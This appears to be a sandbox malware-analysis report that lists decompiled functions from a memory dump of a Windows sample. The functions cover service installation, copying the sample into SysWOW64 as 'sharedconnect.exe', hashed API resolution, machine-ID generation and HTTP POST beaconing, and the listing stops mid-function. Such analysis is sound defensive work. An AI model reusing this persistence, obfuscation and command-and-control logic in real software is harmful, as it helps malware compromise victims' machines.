Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 689b3fca2689f99256c7f2438b506ea86cf87c204728fd43cbcf3e8e51dc96f7
Instruction ID: 388299d095689095b0e394164536f8f448c2f9d39882d93914d22be04f5571ac
Opcode Fuzzy Hash: 689b3fca2689f99256c7f2438b506ea86cf87c204728fd43cbcf3e8e51dc96f7
Instruction Fuzzy Hash: 23C04C36A02114DB8A105BA9B80829CF7A4D7481627050193F905D2620D6714D515781

Uniqueness

Uniqueness Score: -1.00%

Function 00CD81DF, Relevance: 1.5, APIs: 1, Instructions: 7
serviceCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00CD81DF(void* __ebx, void* __edi, void* __esi) {
				int _t2;
				void* _t11;
				int _t14;

				_t11 = __edi;
				 *0xcda5ec();
				_t2 = E00CD18C0(__esi);
				_t14 = 0;
				if(__ebx != 0) {
					_t14 = StartServiceW();
					_t2 = CloseServiceHandle(__ebx);
				}
				L00CD80B0(_t2, _t11);
				CloseServiceHandle(_t11);
				return _t14;
			}

0x00cd81df
0x00cd81df
0x00cd81e7
0x00cd81ec
0x00cd81f0
0x00cd81fe
0x00cd8200
0x00cd8200
0x00cd8208
0x00cd820e
0x00cd821c

APIs

ChangeServiceConfig2W.ADVAPI32 ref: 00CD81DF

Part of subcall function 00CD18C0: GetProcessHeap.KERNEL32(00000000,?,00CD10E3), ref: 00CD18C3
Part of subcall function 00CD18C0: RtlFreeHeap.NTDLL(00000000), ref: 00CD18CA

CloseServiceHandle.ADVAPI32(00000000,?,?), ref: 00CD820E

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: HeapService$ChangeCloseConfig2FreeHandleProcess
String ID:
API String ID: 798051021-0
Opcode ID: e0c37bbc714290df485bf9149050a4a4c26d83c36d29ac7748a3edb59b0b7c8d
Instruction ID: 02343066443690e1ddb3b1e6e6c1ae8c5c7cd0c4df9a6c6dd73ffe1a85b337fd
Opcode Fuzzy Hash: e0c37bbc714290df485bf9149050a4a4c26d83c36d29ac7748a3edb59b0b7c8d
Instruction Fuzzy Hash: 18B01235205A61C3451057E1155A32EAA654E00BC0305001B9E1232340AE108A0564D2

Uniqueness

Uniqueness Score: -1.00%

Function 00CD839A, Relevance: 47.3, APIs: 1, Strings: 26, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CD839A(intOrPtr* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
				 *__eax =  *__eax + __eax;
			}

0x00cd839f
0x00cd83a4

APIs

_snwprintf.NTDLL ref: 00CD8473

Strings

V, xrefs: 00CD8449
F, xrefs: 00CD83D9
i, xrefs: 00CD8457
R, xrefs: 00CD8465
", xrefs: 00CD83AA
u, xrefs: 00CD8434
\, xrefs: 00CD842D
C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 00CD83B9
n, xrefs: 00CD845E
r, xrefs: 00CD83FC
R, xrefs: 00CD83E7
S, xrefs: 00CD83D2
W, xrefs: 00CD83E0
\, xrefs: 00CD8411
n, xrefs: 00CD8442
r, xrefs: 00CD8450
i, xrefs: 00CD8418
d, xrefs: 00CD841F
f, xrefs: 00CD840A
i, xrefs: 00CD83F5
s, xrefs: 00CD83C5
n, xrefs: 00CD846C
w, xrefs: 00CD8426
r, xrefs: 00CD843B
s, xrefs: 00CD8403
\, xrefs: 00CD83EE

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID: "$C:\Windows\SysWOW64\sharedconnect.exe$F$R$R$S$V$W$\$\$\$d$f$i$i$i$n$n$n$r$r$r$s$s$u$w
API String ID: 3988819677-687175188
Opcode ID: feb6f40f4f8e5e76df545276a9e4427eaf5244fc2dc11589cb1c351b990367a1
Instruction ID: 549eb90a2392980ee7f150070de2972c8888c28aaf62b32dc850e56196d9cca5
Opcode Fuzzy Hash: feb6f40f4f8e5e76df545276a9e4427eaf5244fc2dc11589cb1c351b990367a1
Instruction Fuzzy Hash: 5221B0B0C01359DFDB10CF91A9886EDBFB5BB05708F10415ADA186A252D7FA4688CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7C7A, Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 29COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,0000001C,?,?,C:\Windows\SysWOW64), ref: 00CD7CCE
_snwprintf.NTDLL ref: 00CD7CE7

Strings

f, xrefs: 00CD7CA7
i, xrefs: 00CD7C92
%, xrefs: 00CD7C7A
C:\Windows\SysWOW64, xrefs: 00CD7C81, 00CD7CD4, 00CD7CE2
d, xrefs: 00CD7CBC
i, xrefs: 00CD7CB5
w, xrefs: 00CD7CC3
r, xrefs: 00CD7C99
s, xrefs: 00CD7CA0
\, xrefs: 00CD7C8B
\, xrefs: 00CD7CAE

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: FolderPath_snwprintf
String ID: %$C:\Windows\SysWOW64$\$\$d$f$i$i$r$s$w
API String ID: 3078599568-3812650318
Opcode ID: b2a6299c0c3448a010c31b8e443ab27b14ecb9c4ef5d94ac088fb6b22352085b
Instruction ID: 6e8e6949e12a311462f38e2ff053e8d14beda2c306f6edccc71edd6ad053e8ad
Opcode Fuzzy Hash: b2a6299c0c3448a010c31b8e443ab27b14ecb9c4ef5d94ac088fb6b22352085b
Instruction Fuzzy Hash: ABF0ECB094120CEEEB00DFD59809BEDBFB9EB08719F00805AE61476651C3F606488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7E19, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CD7E19(DWORD* __eax) {
				char _t28;
				char* _t32;
				void* _t33;

				 *(_t33 - 8) = 0x10;
				 *((intOrPtr*)(_t33 - 0x10)) = 0x255f7325;
				 *((intOrPtr*)(_t33 - 0xc)) = 0x583830;
				 *(_t33 - 4) = 0x58;
				if(GetComputerNameW(_t33 - 0x40, __eax) == 0) {
					L12:
					 *(_t33 - 0x20) = 0x58;
					L13:
					return  *0xcda7c8("045012_AF72BC4A", 0x104, _t33 - 0x10, _t33 - 0x20,  *0xcda844);
				}
				 *0xcda83c = E00CD1450(_t33 - 0x40);
				if((0 | WideCharToMultiByte(0, 0x400, _t33 - 0x40, 0xffffffff, _t33 - 0x20, 0x10, _t33 - 4, 0) > 0x00000000) == 0) {
					goto L12;
				}
				_t32 = _t33 - 0x20;
				if( *(_t33 - 0x20) == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t28 =  *_t32;
					if(_t28 < 0x30 || _t28 > 0x39) {
						if(_t28 < 0x61 || _t28 > 0x7a) {
							if(_t28 < 0x41 || _t28 > 0x5a) {
								 *_t32 = 0x58;
							}
						}
					}
					_t32 = _t32 + 1;
				} while ( *_t32 != 0);
				goto L13;
			}

0x00cd7e19
0x00cd7e24
0x00cd7e2c
0x00cd7e33
0x00cd7e41
0x00cd7ea8
0x00cd7ea8
0x00cd7eae
0x00cd7ed2
0x00cd7ed2
0x00cd7e4d
0x00cd7e78
0x00000000
0x00000000
0x00cd7e7e
0x00cd7e81
0x00000000
0x00000000
0x00000000
0x00000000
0x00cd7e83
0x00cd7e83
0x00cd7e83
0x00cd7e87
0x00cd7e8f
0x00cd7e97
0x00cd7e9d
0x00cd7e9d
0x00cd7e97
0x00cd7e8f
0x00cd7ea0
0x00cd7ea1
0x00000000

APIs

GetComputerNameW.KERNEL32(?), ref: 00CD7E39
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000058,00000000), ref: 00CD7E69
_snprintf.NTDLL ref: 00CD7EC6

Strings

08X, xrefs: 00CD7E2C
X, xrefs: 00CD7EA8
X, xrefs: 00CD7E33
%s_%, xrefs: 00CD7E24
045012_AF72BC4A, xrefs: 00CD7EC1

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ByteCharComputerMultiNameWide_snprintf
String ID: %s_%$045012_AF72BC4A$08X$X$X
API String ID: 4080658169-64918874
Opcode ID: 3f44aa6e2de7c3c0c92f9ba2efb86328b78799832c98a2385932bec1193fc38a
Instruction ID: b509fb9ad83cbdacfed9901084b068567bfa6c3b6f960bbd2369a816251e4f4b
Opcode Fuzzy Hash: 3f44aa6e2de7c3c0c92f9ba2efb86328b78799832c98a2385932bec1193fc38a
Instruction Fuzzy Hash: 1111037194511CAEEF10CBA4CC85BEE77B8BF06304F44028BEA51F6690F7708A46CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7D07, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CD7D07(void* __eax, void* __ebx, intOrPtr __ecx) {
				void* __esi;
				intOrPtr _t18;
				void* _t21;
				void* _t24;

				_t18 = __ecx;
				_t1 = __ecx + 0x65;
				 *_t1 =  *((intOrPtr*)(__ecx + 0x65)) + __ebx;
				 *((intOrPtr*)(_t24 - 0x14)) = 0x730025;
				 *((intOrPtr*)(_t24 - 0x10)) = 0x25005c;
				 *((intOrPtr*)(_t24 - 0xc)) = 0x2e0073;
				 *((intOrPtr*)(_t24 - 8)) = 0x780065;
				 *((intOrPtr*)(_t24 - 4)) = __ecx;
				if( *_t1 == 0) {
					L00CD7C70(__eax);
				} else {
					L00CD7C50();
				}
				L00CD7BD0(L00CD1BA0(_t18, _t21));
				L00CD1BF0(_t11);
				return  *0xcda7cc("C:\Windows\SysWOW64\sharedconnect.exe", 0x104, _t24 - 0x14, "C:\Windows\SysWOW64", "sharedconnect", _t18, _t21);
			}

0x00cd7d07
0x00cd7d0c
0x00cd7d0c
0x00cd7d12
0x00cd7d19
0x00cd7d20
0x00cd7d27
0x00cd7d2e
0x00cd7d31
0x00cd7d3a
0x00cd7d33
0x00cd7d33
0x00cd7d33
0x00cd7d4a
0x00cd7d51
0x00cd7d7b

APIs

_snwprintf.NTDLL ref: 00CD7D6E

Strings

s, xrefs: 00CD7D20
C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 00CD7D69
C:\Windows\SysWOW64, xrefs: 00CD7D5B
%, xrefs: 00CD7D12
\, xrefs: 00CD7D19
e, xrefs: 00CD7D27
sharedconnect, xrefs: 00CD7D56

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID: %$C:\Windows\SysWOW64$C:\Windows\SysWOW64\sharedconnect.exe$\$e$s$sharedconnect
API String ID: 3988819677-2451313573
Opcode ID: 94e5e77c901278d80dbcedca7c4630240aef9eb19178cdecc03414796e082d80
Instruction ID: 7c1e432c662df085aa5152ee6ebdb66f03dc63b9614d5f8207513e4337ea1ae7
Opcode Fuzzy Hash: 94e5e77c901278d80dbcedca7c4630240aef9eb19178cdecc03414796e082d80
Instruction Fuzzy Hash: A0F059B09442087FC700BBA08C457AE3A759F00304F40016BEA046A341EBF6060457D7

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6C3B, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CD6C3B(short __eax) {
				void* _t51;
				void* _t54;
				void* _t55;

				 *(_t55 - 0x1c) = 0x640061;
				 *((short*)(_t55 - 4)) = __eax;
				 *((intOrPtr*)(_t55 - 0x18)) = 0x610076;
				 *((intOrPtr*)(_t55 - 0x14)) = 0x690070;
				 *((intOrPtr*)(_t55 - 0x10)) = 0x320033;
				 *((intOrPtr*)(_t55 - 0xc)) = 0x64002e;
				 *((intOrPtr*)(_t55 - 8)) = 0x6c006c;
				 *((intOrPtr*)(_t55 - 0xb0)) = 0x33cc4020;
				 *((intOrPtr*)(_t55 - 0xac)) = 0x9f0daa96;
				 *((intOrPtr*)(_t55 - 0xa8)) = 0x5ca0b0ad;
				 *((intOrPtr*)(_t55 - 0xa4)) = 0x1c96886d;
				 *((intOrPtr*)(_t55 - 0xa0)) = 0xe391654b;
				 *((intOrPtr*)(_t55 - 0x9c)) = 0x6904e160;
				 *((intOrPtr*)(_t55 - 0x98)) = 0x997c2bb6;
				 *((intOrPtr*)(_t55 - 0x94)) = 0x94d35bd5;
				 *((intOrPtr*)(_t55 - 0x90)) = 0xbee2db1f;
				 *((intOrPtr*)(_t55 - 0x8c)) = 0x63d42b4;
				 *((intOrPtr*)(_t55 - 0x88)) = 0x4dfe2e46;
				 *((intOrPtr*)(_t55 - 0x84)) = 0x37177fe4;
				 *((intOrPtr*)(_t55 - 0x80)) = 0xbc69ca64;
				 *((intOrPtr*)(_t55 - 0x7c)) = 0x5ded52fa;
				 *((intOrPtr*)(_t55 - 0x78)) = 0x3bfe6937;
				 *((intOrPtr*)(_t55 - 0x74)) = 0xa27d54c5;
				 *((intOrPtr*)(_t55 - 0x70)) = 0x3b36f17e;
				 *((intOrPtr*)(_t55 - 0x6c)) = 0xa97569b5;
				 *((intOrPtr*)(_t55 - 0x68)) = 0x3d04be79;
				 *((intOrPtr*)(_t55 - 0x64)) = 0x3e86ae46;
				 *((intOrPtr*)(_t55 - 0x60)) = 0x6e587f2a;
				 *((intOrPtr*)(_t55 - 0x5c)) = 0x87244c93;
				 *((intOrPtr*)(_t55 - 0x58)) = 0x72885b33;
				 *((intOrPtr*)(_t55 - 0x54)) = 0x3f8fc85;
				 *((intOrPtr*)(_t55 - 0x50)) = 0xdd1920a8;
				 *((intOrPtr*)(_t55 - 0x4c)) = 0xd730e46d;
				 *((intOrPtr*)(_t55 - 0x48)) = 0xd2f5ba1b;
				 *((intOrPtr*)(_t55 - 0x44)) = 0x1c079652;
				 *((intOrPtr*)(_t55 - 0x40)) = 0x2315069c;
				 *((intOrPtr*)(_t55 - 0x3c)) = 0xe15cc32;
				 *((intOrPtr*)(_t55 - 0x38)) = 0xad9cb11c;
				 *((intOrPtr*)(_t55 - 0x34)) = 0xcd8e55ea;
				 *((intOrPtr*)(_t55 - 0x30)) = 0xe4d3dd96;
				 *((intOrPtr*)(_t55 - 0x2c)) = 0xf2e75668;
				 *((intOrPtr*)(_t55 - 0x28)) = 0x5ce7d387;
				 *((intOrPtr*)(_t55 - 0x24)) = 0x2ccd65a4;
				 *((intOrPtr*)(_t55 - 0x20)) = 0x580ea151;
				 *0xcda850 = LoadLibraryW(_t55 - 0x1c);
				return E00CD1620(_t51, _t49, _t55 - 0xb0, _t54, 0x25, 0x31dbb1c1, 0xcda5e0);
			}

0x00cd6c3b
0x00cd6c42
0x00cd6c4a
0x00cd6c51
0x00cd6c58
0x00cd6c5f
0x00cd6c66
0x00cd6c6d
0x00cd6c77
0x00cd6c81
0x00cd6c8b
0x00cd6c95
0x00cd6c9f
0x00cd6ca9
0x00cd6cb3
0x00cd6cbd
0x00cd6cc7
0x00cd6cd1
0x00cd6cdb
0x00cd6ce5
0x00cd6cec
0x00cd6cf3
0x00cd6cfa
0x00cd6d01
0x00cd6d08
0x00cd6d0f
0x00cd6d16
0x00cd6d1d
0x00cd6d24
0x00cd6d2b
0x00cd6d32
0x00cd6d39
0x00cd6d40
0x00cd6d47
0x00cd6d4e
0x00cd6d55
0x00cd6d5c
0x00cd6d63
0x00cd6d6a
0x00cd6d71
0x00cd6d78
0x00cd6d7f
0x00cd6d86
0x00cd6d8d
0x00cd6dac
0x00cd6dbe

APIs

LoadLibraryW.KERNEL32 ref: 00CD6D94

Strings

p, xrefs: 00CD6C51
a, xrefs: 00CD6C3B
3, xrefs: 00CD6C58
l, xrefs: 00CD6C66
., xrefs: 00CD6C5F
v, xrefs: 00CD6C4A

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .$3$a$l$p$v
API String ID: 1029625771-1296750983
Opcode ID: 4471d1036b3b382b45db16400330f417b51c5fbc3937da53d57d12a1a4474a7e
Instruction ID: 40e3e84aa15561dfedb81b68ced436f3ae2355dcab03b602fe0c4fb6b3580c60
Opcode Fuzzy Hash: 4471d1036b3b382b45db16400330f417b51c5fbc3937da53d57d12a1a4474a7e
Instruction Fuzzy Hash: 6C31C8B0D01368DFDB20CF91AA8578DBBB1FB05744F208688D2583B215DB710A86CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00CD726A, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CD726A(void* __eax) {
				void* _t19;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = 0x6c0047;
				 *((short*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x14)) = 0x62006f;
				 *((intOrPtr*)(_t23 - 0x10)) = 0x6c0061;
				 *((intOrPtr*)(_t23 - 0xc)) = 0x45005c;
				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *0xcda7cc(_t23 - 0x98, 0x40, _t23 - 0x18);
				_t19 = CreateEventW(0, 0, 0, _t23 - 0x98);
				 *0xcda82c = _t19;
				return 0 | _t19 != 0x00000000;
			}

0x00cd7271
0x00cd7278
0x00cd7286
0x00cd7290
0x00cd7297
0x00cd729e
0x00cd72a5
0x00cd72bb
0x00cd72c3
0x00cd72d2

APIs

_snwprintf.NTDLL ref: 00CD72A5
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 00CD72BB

Strings

a, xrefs: 00CD7290
\, xrefs: 00CD7297
G, xrefs: 00CD7271
%, xrefs: 00CD729E
o, xrefs: 00CD7286

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateEvent_snwprintf
String ID: %$G$\$a$o
API String ID: 3138640819-4186019298
Opcode ID: 017dd79402c9fb3924c53ace4d2558e198564f36c48b7ad625ca18943a5b008e
Instruction ID: a28e91e7be2c199424b85f0878158b5c672dbf331d8c4e1bcfd54d6de6c7dc01
Opcode Fuzzy Hash: 017dd79402c9fb3924c53ace4d2558e198564f36c48b7ad625ca18943a5b008e
Instruction Fuzzy Hash: 46F019B0A11209EBDB51CFA49C45BEE7BF8EF04705F11405BEA0CF6281D77196988F99

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6E39, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 20
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CD6E39(WCHAR* __eax) {
				void* _t12;
				void* _t15;
				void* _t16;

				 *((intOrPtr*)(_t16 - 0x1c)) = 0x720063;
				 *((intOrPtr*)(_t16 - 0x18)) = 0x700079;
				 *((intOrPtr*)(_t16 - 0x14)) = 0x330074;
				 *((intOrPtr*)(_t16 - 0x10)) = 0x2e0032;
				 *((intOrPtr*)(_t16 - 0xc)) = 0x6c0064;
				 *((intOrPtr*)(_t16 - 8)) = 0x6c;
				 *((intOrPtr*)(_t16 - 4)) = 0x921bd614;
				 *0xcda858 = LoadLibraryW(__eax);
				return E00CD1620(_t12, _t10, _t16 - 4, _t15, 1, 0x7767dfda, 0xcda674);
			}

0x00cd6e39
0x00cd6e41
0x00cd6e48
0x00cd6e4f
0x00cd6e56
0x00cd6e5d
0x00cd6e64
0x00cd6e80
0x00cd6e92

APIs

LoadLibraryW.KERNEL32 ref: 00CD6E6B

Strings

c, xrefs: 00CD6E39
y, xrefs: 00CD6E41
2, xrefs: 00CD6E4F
l, xrefs: 00CD6E5D
t, xrefs: 00CD6E48
d, xrefs: 00CD6E56

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 2$c$d$l$t$y
API String ID: 1029625771-1585075223
Opcode ID: cbf1ec8fe95998fa12a2f7ef4142770a46b0ef468d598d081f15eaee0a5fc14f
Instruction ID: fbc96c5540224e0d01625fcaa2a983667bd2129e69c2f320e1940f277479fc4a
Opcode Fuzzy Hash: cbf1ec8fe95998fa12a2f7ef4142770a46b0ef468d598d081f15eaee0a5fc14f
Instruction Fuzzy Hash: EAE039B0D41209EEDB00CF90A9497ADBBB1EB10708F14415AEA086A240D3BA07558FD1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD17AB, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
networkCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00CD17AB(void* __edx) {
				long _t15;
				void* _t22;
				void* _t24;
				void* _t32;
				WCHAR* _t34;
				void* _t36;
				void* _t37;

				_t24 = InternetConnectW();
				if(_t24 != 0) {
					 *((intOrPtr*)(_t37 - 0x18)) = 0x4f0050;
					 *((intOrPtr*)(_t37 - 0x14)) = 0x540053;
					 *((short*)(_t37 - 0x10)) = 0;
					_t15 = L00CD1640(0);
					_t17 =  ==  ? 0 : _t37 - 0x18;
					_t36 = HttpOpenRequestW(_t24,  ==  ? 0 : _t37 - 0x18, _t34, _t34, _t34, _t34, _t15, 0);
					if(_t36 != 0) {
						goto 0xe30337;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if(HttpSendRequestW() != 0) {
							_t22 = L00CD1650(_t20, _t36, __edx);
							_t44 = _t22 - 0xc8;
							if(_t22 == 0xc8) {
								 *(_t37 - 4) = L00CD16D0(_t36,  *((intOrPtr*)(_t37 + 0x1c)), _t44);
							}
						}
						InternetCloseHandle(_t36);
					}
					InternetCloseHandle(_t24);
					_t34 =  *(_t37 - 4);
				}
				InternetCloseHandle(_t32);
				E00CD18C0( *((intOrPtr*)(_t37 - 0xc)));
				return _t34;
			}

0x00cd17b1
0x00cd17b5
0x00cd17b9
0x00cd17c1
0x00cd17c8
0x00cd17cc
0x00cd17de
0x00cd17e9
0x00cd17ed
0x00cd17ef
0x00cd17f4
0x00cd17f5
0x00cd17f6
0x00cd17f7
0x00cd17f8
0x00cd17f9
0x00cd1802
0x00cd180b
0x00cd1810
0x00cd1815
0x00cd1821
0x00cd1821
0x00cd1815
0x00cd1825
0x00cd1825
0x00cd182c
0x00cd1832
0x00cd1832
0x00cd1836
0x00cd183f
0x00cd184c

APIs

InternetConnectW.WININET ref: 00CD17AB
HttpOpenRequestW.WININET(00000000,004F0050,?,?,?,?,00000000,00000000), ref: 00CD17E3
InternetCloseHandle.WININET(00000000), ref: 00CD182C
InternetCloseHandle.WININET ref: 00CD1836

Strings

S, xrefs: 00CD17C1
P, xrefs: 00CD17B9

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$ConnectHttpOpenRequest
String ID: P$S
API String ID: 830097650-2423723594
Opcode ID: dd01b65421bb32cac1540504c529640c69e17f22173b61452a83277b00bd61c0
Instruction ID: 8d01d8937cfad111f537dabb5274d5d9699766f3c66430e1ab94103f68e5e273
Opcode Fuzzy Hash: dd01b65421bb32cac1540504c529640c69e17f22173b61452a83277b00bd61c0
Instruction Fuzzy Hash: 21F04F71A02219AB8B109BA4DC496FFBBB8EE04351B05006BFE05E2241DB70DE00D7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1258, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00CD1258(void* __esi) {
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				_t19 = __esi;
				GetModuleFileNameW(??, ??, ??);
				_push(_t21 - 0x30);
				_push(0x80);
				if(L00CD1E60(__esi) != 0) {
					WaitForSingleObject(_t17, 0xffffffff);
					CloseHandle( *(_t21 - 0x30));
					CloseHandle( *(_t21 - 0x2c));
				}
				CloseHandle(_t17);
				CloseHandle(_t14);
				return _t19;
			}

0x00cd1258
0x00cd1258
0x00cd1261
0x00cd1262
0x00cd1277
0x00cd127c
0x00cd1285
0x00cd128e
0x00cd128e
0x00cd1295
0x00cd129c
0x00cd12aa

APIs

GetModuleFileNameW.KERNEL32 ref: 00CD1258
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CD127C
CloseHandle.KERNEL32(?,?,000000FF), ref: 00CD1285
CloseHandle.KERNEL32(?,?,000000FF), ref: 00CD128E
CloseHandle.KERNEL32(?,?,000000FF), ref: 00CD1295
CloseHandle.KERNEL32(?,?,?,000000FF), ref: 00CD129C

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: 01367c4e1155dd6f76419c1a99eb71df4589a2f1002e01a9d79689efd8ab5b34
Instruction ID: 040fd43800a4fe2d57a09114dcadf4cec8a862d17d2295a913ab6472e73e9aea
Opcode Fuzzy Hash: 01367c4e1155dd6f76419c1a99eb71df4589a2f1002e01a9d79689efd8ab5b34
Instruction Fuzzy Hash: 4EE0ED32501218EBCB016BE4FC48BADB738FF05752B054167FA16D11A1DB254915DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8220, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CD8220(WCHAR* __ecx) {
				WCHAR* _t19;
